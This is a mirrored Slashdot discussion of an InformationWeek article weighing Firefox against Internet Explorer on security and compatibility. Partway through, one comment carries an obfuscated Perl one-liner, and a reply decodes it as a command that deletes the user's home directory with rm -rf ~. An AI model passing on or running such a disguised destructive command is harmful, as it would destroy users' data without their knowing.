Slashdot Mirror
Pros and Cons of Firefox Critically Evaluated?
A Dafa Disciple writes "Fred Langa of Information Week has written an article claiming to discuss the 'Pros and Cons of Firefox'. At first I was excited because I thought I was going to get to finally read an enlightening, in-depth article that critically examined the browser. I should have known better. Aside from the usual criticism of open source software, it contains a reference to a Symantec Internet Security Report which claims that more security vulnerabilities in the last six months of 2004 were found in Firefox than IE. I'll leave it to you to analyze Mr. Langa's opinion and scrutinize Symantec's study and reputation as a security software developer."
Is all the plugins, extensions, chrome, files, and settings that have to be configured after you have the Firefox browser up and running. It would be really nifty to be able to bundle all the things that I do when I install firefox into one mega "extension bundle" or some such that I could install with one click.
i have begun to doubt symantec's expertise. i work in a college where virus outbreaks are pretty common. now i've seen a computer with the most up to date, newest version of norton/symantec anti-virus and it seems that it still does not find all the viruses. viruses and trojans that are relatively harmful to the system. i would take this story with a grain of salt...
please me, have no regrets.
At first I was excited because I thought I was going to get to finally read an enlightening, in-depth article that critically examined the browser.
And I thought my life was dull. You need help my friend. Now!
one question should be asked... who releases patches and security updates in a more timely manner? mozilla or microsoft? while firefox may have had more security flaws than IE, it gets patched almost immediately.
please me, have no regrets.
Print version of the article fitting nicely onto one page.
Its a little odd that this article would be posted without a note that Firefox 1.0.3 has just been released: http://www.mozilla.org/products/firefox/releases/1 .0.3.html
http://www.frontmotion.com/Firefox/
Have you tried this by chance?
I haven't personally, but I keep hearing good things about it.
Karma: Chameleon (mostly due to the fact that you come and go).
Disregarding the validity of the position, apparently the OP felt that the cons were based largely on positions already proven false. As a result, enlightenment in this case would have been based on cons based on results considered less inflammatory.
Assuming the OP truly was not looking for a 'yes man' style of article, it is reasonable to believe a review detailing true failings of Firefox without resorting to questionable statistics would have met the requirements for 'enlightenment'.
I used to run adaware with IE, I've run it once and a while since I switched to firefox and it'll occasionally find a cookie or two that doesn't bother me. With IE it'd find a couple hundred problems.
Security vulnerabilites my ass.
(yes I know spyware and security is different, but firefox sure is a lot less of a pain in the ass)
"You can't handle the truth! Son, we live in a world that has (fire) walls. And those walls have to be guarded by men with (antivirus software.) Who's gonna do it? You? ... I have a greater responsibility than you can possibly fathom. You weep for (FireFox) and you curse (Microsoft.) You have that luxury. You have the luxury of not knowing what I know: that (IE6.0 vulnerabilities,) while tragic, probably saved lives. And my existence, while grotesque and incomprehensible to you, saves lives...You don't want the truth. Because deep down, in places you don't talk about at parties, you want me on that wall. You need me on that (fire) wall."
ELOI, ELOI, LAMA SABACHTHANI!?
Cons: It isn't explorer**
*potentially more secure
**some pages don't render right since some people only test with explorer
I Am My Own Worst Enemy
You've got whats coming to you if you just copy and paste, and then run random code that you found on the internet quite frankly.
"Hey! Unless this is a nude love-in, get the hell off my property!!"
Just because it's critical doesn't mean it's enlightening. I could give my five year old daughter a stack of printouts detailing vulnerabilites found by group XYZ, and in a second she can tell you which stack was bigger and might even count them out if she felt inclined to. That's not enlightening... What matters is quality, not quantity.
Also, anybody can get access to the source of Firefox, while IE doesn't have publicly viewable source code. Comparing vulnerabilities among the two browsers is an apples and oranges afair thanks to this.
I assume you haven't RTFA, but here's more or less the criticism that Firefox gets:
1) "Oh look! It has more vulnerabilities than IE!" (tho they fail to state how critical these are. And don't forget that Firefox 1.03 was just released, fixing these. How long it took IE to release theirs?)
and 2) "BWA! Firefox fails to render my favorite IE-only pages!" complains from users.
And that was on the last 1 1/2 pages. The others were just straw words (your usual columnist intro).
This columnist isn't enlightening, nor critical. He's just giving another misinformed opinion.
Firefox is still under active development. It's not surprising that occasionally a new bug, including ones that compromise security will be introduced. IE, on the other hand, has been unchanged, asside from bug fixes. All development work on IE was stopped until Firefox forced their hand. I don't think there have yet been any new releases of IE since Service Pack 2, which put 6.0.2900.2180 out in the world.
So, I wouldn't be surprised if more new security problems were located in Firefox in the recent past than in IE during the same time period. That doesn't imply that there are fewer problems in IE than in Firefox, just that fewer were found in a given time period.
Which means.... practically nothing. The relevant information would be total numbers of security problems over the total number of lines of code or some similar metric, if you want to discuss the quality of the code.
If you want to know which browser is the most secure, you should look at the total number of security bugs known to exist and the severity of those bugs.
For my money, Firefox is the only browser that I trust. I run IE only when I have no choice and when that happens I send an email to the manager of the site telling them why I won't visit again.
Microsoft abandoned good engineering practices in order to grab at market share. As a result, they crippled both their browser and their operating system.
-All that is gold does not glitter - Tolkien
www.ra
And the more people use it, the more it's gonna get targeted.
Just because more people drive cars than armoured vans, doesn't mean that cars are targeted more just because they're greater in number. In fact, the payload would be greater attacking armoured cars. In reality, some things are just designed with greater security in mind, from the offset.
We see a large number of nitpick vulerabilities for open source because everyone can look at the source code and try to break it every which way. OTOH, finding exploits in IE is done by testers and hackers.
Regarding dupes, visiting Secunia shows many vulnerabilies for linux distros, but you see the same ones over and over again for each distrobution.
So while I agree that no software is perfect, and Firefox does have problems that arise from time to time, as does any software, I'll still be using the fox for my net browsing.
As for those testimonies in the article from people who can't get Firefox or Thunderbird working properly, wow. I've switched people's grandparents with no computer literacy with no problem. All I can say is that their system must be jacked up.
In my opinion of using the software as long as I have, I would never use IE again unless forced to. And that small amount of time I do use IE, I spend twice as much afterwards cleaning out the damn mess made by malware.
I think because of it's Open Source nature when Moz or some derivative gains market share and becomes the primary target of ad companies, it still won't make that much of an impact on the browser as a whole.
I am Bennett Haselton! I am Bennett Haselton!
A lot of other security/AV companies get definitions out MUCH faster than Symantec. I remember occasionally using Sophos's and other AV sites to solve virus issues becuase we didn't have the info.
Don't take life so seriously. No one makes it out alive.
http://www.informationweek.com/shared/printableArt icle.jhtml?articleID=160900911
I have found Firefox to be more logical looking in its layout using CSS elements and have had to rework pages more often for IE than the other way around. The problem is that many websites don't bother to check the look of a page in anything other than IE. So how is this FireFox's fault? Langa just assumes IE is getting it right and that there is no ambiguity in the way some HTML elements are specified.
In theory there may be more bugs and possible security threats lying in wait in FireFox, but here it the thing, since switching to FireFox I have had FAR fewer virus problems. Now it could just be the smaller market thing, but so what - what I care about is how many real viruses I am exposed to. You could argue that should FireFox continue to grow in popularity, so will the attacks on it by virus writers, bring it back to parity with IE. That may be, but hasn't happened yet. BUT it could just be that the open software model means more work on the code and better more secure code when it gains an even wider audience. In fact this is the horse I would bet on.
Letter To Iran
I read the comment about Firefox not displaying the Yahoo logo and I couldn't believe it. Then, I popped over to Yahoo.com and sure enough, no logo.
A quick check of the source told me what was going on. I recognized the yimg URL as one that I had *BLOCKED* images from long ago. Yahoo serves tons of graphics ads all over the Internet and I just blocked them all using Firefox's native ability to block images from a particular URL.
It seems Yahoo serves their own graphics from the same server as their ads. Silly rabbit.
So, it isn't a rendering bug with Firefox, it is a feature! And a damned useful one at that.
feature + ignorance = bug? Sad.
-Charles
Learning HOW to think is more important than learning WHAT to think.
"Or should the Fx developers be forced to protect you from your own carelessness?"
Yes. I should not have to know a damn thing about computers in order to protect my information.
Granny buys something online and sees that auto complete can save her time next time. She won't stop to think about how it works if she even stops to read anything at all before clicking "yes" to the "would you like to use auto complete" dialog.
All auto complete information should be encrypted. No excuses.
http://brandonbloom.name
$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{~" -;;s;;$_;see
; ;
Adding whitespace
($?) ? s:;s:s;;$?:
: s;;=]=>%-{<-|}<&|`{;
y; -/:-@[-`{-};`-{~" -;
s;;$_;see
$? is equal to zero normally, so that's the same as
s//=]=>%-{<-|}<&|`{/;
y/ -\/:-@[-`{-}/`-{~" -/;
s//$_/see
The first statement => $_ = '=]=>%-{<-|}<&|`{';
second translates $_ to 'system"rm -rf ~"'
third: eval $_
But, by writing off all of Internet Explorer's problems to the "installed base" scale factor is extremely dangerous to his readers.
The problem being, since MSIE is embedded into the OS, a flaw in MSIE can be exploited from any program which uses an HTML viewer, not only the "iexplore.exe" application itself. Firefox, even when it's your default browser, still pops up in full "visiting the Web" paranoia.
Another problem, of course, relates to MSIE's very strange handling of text/plain and application/octet-stream data types. (It will actually reject the Content-type: header from the server and make up a new one based on filename suffix and/or file content... imagine sending a text/plain file from a CGI URL that has ".doc" in it and it turning into a Word file. Note that the ".doc" is in the URL, not in the downloaded file name....) I've got a CGI I just can't make with MSIE properly because it rejects my server's claim that file "foo.log" with "inline" presentation is type "text/plain" and it can display it--it insists on saving to disk... only to find out that Notepad is the right application. To work around it, I'd have to change the extra path information fed to the CGI... and I can't do that--it means something, of course.
But that problem ("feature", if you read the MS knowledgebase) is one way how people are tricked into downloading seemingly "safe" content that turns dangerous.
Plus, he makes no assessment of the security problems. He doesn't mention ANY, from ANY browser, not even as illustration--he just leaves it to the reader to plow through pages of cryptic reports from Synamtec and CERT.
And he's got no analysis of the "trouble reports" he provides for Firefox. Missing images? 99 times out of 100, that's because the Web page has backslashes in the IMG URLs--which are not part of the hierarchical URI syntax. (They work only in MSIE on Windows. MSIE for Macintosh will not process them the same way.)
Plus... how do we really know what security problems are fixed in MSIE? On my XP box at home, and the W2K boxes I have to use at work, the Windows Updates just say things like, "A security problem could allow an attacker access to your computer." How am I to know what that security problem is, what part of the system it affects? I don't even know if it is function I use, or even have enabled--the update information is just too terse--at that's after clicking, "Show Details".
(My main systems are Linux and Mac, so there may be a way to get more information from Windows Update, but it isn't as obvious... unlike Mac OS X Software Update, where it lists the major components right there, and links that take you to the Apple web site for more information.)
Easy.
1. Dont do autocomplete (or make this a default off option) on ssl forms.
2. Credit card #'s are 16 digits with known prefixes. Detecting them isnt a difficult problem. Same with social security numbers.
My five year old daughter could prioritize them by severity and likelihood of exploit, add in a few of her own, and generate a patch that fixes them on the three most common platforms. What lame school are you sending your kids to?
Dewey, what part of this looks like authorities should be involved?
If you're so afraid it of its security vulnerabilities you can always uninstall FireFox. Can you do that with IE?
The article reads better if you consider it a response to the question "Will Firefox save me from the evils of the Internet?".
The author pretty much buries IE and M$ on security, and then proceeds to remind us not to be to fast jumping to Firefox, as it isn't perfect either. It is fairly new as software goes and we will have to wait and see now that it has enough of an installed base to attract the cyber villians.
If anything the author implied that you should walk, not run to Firefox and remember to apply your bug repellent.
BTW. I use Firefox almost exclusively, and have watched as websites have slowly gotten around the pop-up blocker, and how 1.01 came out to block the multi-language DNS hack, which IE isn't vulnerable too because it is so old.
Have each user account associated with an encryption key. That key is used to encrypt all auto-complete information. That way, auto-complete still works and doesn't need to know about credit card numbers (or about any other important type of data), but doesn't expose the information to unauthorized individuals.
It's a small world and it smells funny; I'd buy another if it wasn't for the money; Take back what I paid (SoM)
Having read the article, and also followed the author's advice to read the security bulletins, I found that the article is mostly bullshit, which stumbles upon lucid points occasionally, though I think this is mostly by accident. /. all day, have a desire to defend Firefox, and don't have a job.
I didn't bother to do a count of items in the bulletins, as this is an utterly worthless metric. Nor do I agree that percentage of complaints is a worthwhile way to judge two competing products.
Just to dispel that idea. Consider for a moment that in his example of 1000 users of A vs. 50 users of B, a 2 person anomoly would be a 0.2% shift in the numbers for A and a 4% shift in the numbers for B. That margin of error for product B is so large as to make the whole study worthless.
On the other hand, of the items in the bulletins, Firefox did have some serious flaw, e.g. the kind that end in "would allow a malicious user to execute arbitrary code." So, the author is right that Firefox is not some panacea for security, he just fails to explain the real reason why.
Now, is Firefox more secure overall? I haven't the slightest clue. I really don't have the time and or will to go through the bulletins, aggregate all of the flaws for each browser, assign a numerical value to each severity, and then come up with a score. I offer this idea to any of those who surf
The author also brings up the old argument of, its not currently a target, so its more secure because of obscurity. I think this argument was valid, right up until Firefox hit 1.0. Before that, it was an obscure little browser which didn't get much attention. However, once it hit 1.0 it got a lot of press; and, the way I see it, this would have given a huge incentive for the black hats to start hitting Firefox, for the right to say that they had one of the first working exploits for this new browser. So, I think this argument falls apart.
So, without a real study to backup and/or revoke the idea that Firefox is more secure than IE, the only thing I have to go on is antecdotal evidence. Right now I support about 100 computers. And, because of the way we do business, each user has administrative access to their own box (fun on a bun!). Now, because of this, I have a mix of IE users and Firefox users. For the most part, the computers which I am cleaning up spyware/adware on all of the time tend to be the IE user's computers. While I do have to do an occasional cleanup of a Firefox computer, the problems tend to come from other third party apps bundled with spyware, as opposed to the IE, browsed to the wrong page and got infected spyware.
Does this mean Firefox is more secure? No, one factor, which I can't really rule out, is that the people who use Firefox also tend to be the more knowledgable computer users; so, they may simply be better at avoiding infection. As a counter example, our network engineer runs IE, and doesn't have a problem with spyware/adware, so maybe its just the person at the keyboard making the difference. But, still the preponderence of the evidence would suggest that the Firefox machines tend to be less infected, so there is some correlation, if not outright causation.
One other thing, which helps keep me on Firefox, have you ever tried to re-install IE6 SP2? Fucking pain in the ass. Some spyware/adware will attach itself to the IE DLL's, and is near impossible to get rid of. Also, I have had more than one machine where the removal of the spyware/adware has broken the IE scripting engine. This is also ignoring that crapware that damages winsock as it gets removed. Thank <insert diety here> for the automated winsock repair tool.
MS has made re-installing IE harder and harder as they have released updates. In IE5 I could do an add/remove programs on it, and get a reinstall out of it. In IE6 SP1, I could futz with the registry and get it to allow a re-install. Now that seems to be broken, as the MS recommended registry change to allow a reinstall seems to be broken. Th
Necessity is the mother of invention.
Laziness is the father.
"...more security vulnerabilities in the last six months of 2004 were found in Firefox than IE..."
WHO THE FUCK CARES?!?!? All these dumbass writers need to learn that all bugs are NOT created equal. There is a BIG ASS DIFFERENCE between "small flaw that could theoretically be exploited but the good guys found it first and fixed it in two days anyway" and "gaping hole in the default configuration with thousands of exploits in the wild for months on end." I mean, fucking A, how awesome is it to run Windows Update and see a warning like this? "Identified security issues in Internet Explorer could allow an attacker to compromise a Windows-based system... This affects all computers with Internet Explorer installed ( even if you don't run Internet Explorer as your Web browser ). [emphasis added]"
Which would you rather live in: a city with a hundred arsonists or a thousand litterbugs?
Dear Slashdot: next time you want to mess with the site, add a rich-text editor for comments.
Actually IE6 has now been out for 4 years. And a person should hope that a 4 year old product that is used by millions of people everday should have the bugs worked out if it by now.
Now as far as how to compare them check out this article. It compares security on a very sound premise: If you keep up-to-date with updates how long are you vulnerable. The answer: IE: 51 weeks during 2004, Firefox: 8 Weeks during 2004.
Lets rephrase that; using firefox I was safe from known exploits 10 months last year. If I was an idiot and used IE, I was only safe from known exploits 1 lousy week during the whole year.
Which are you going to choose? Get FireFox!
Looking for a job?
Want your resume written professionally?
DON'T USE TUNAREZ!!!
Parent: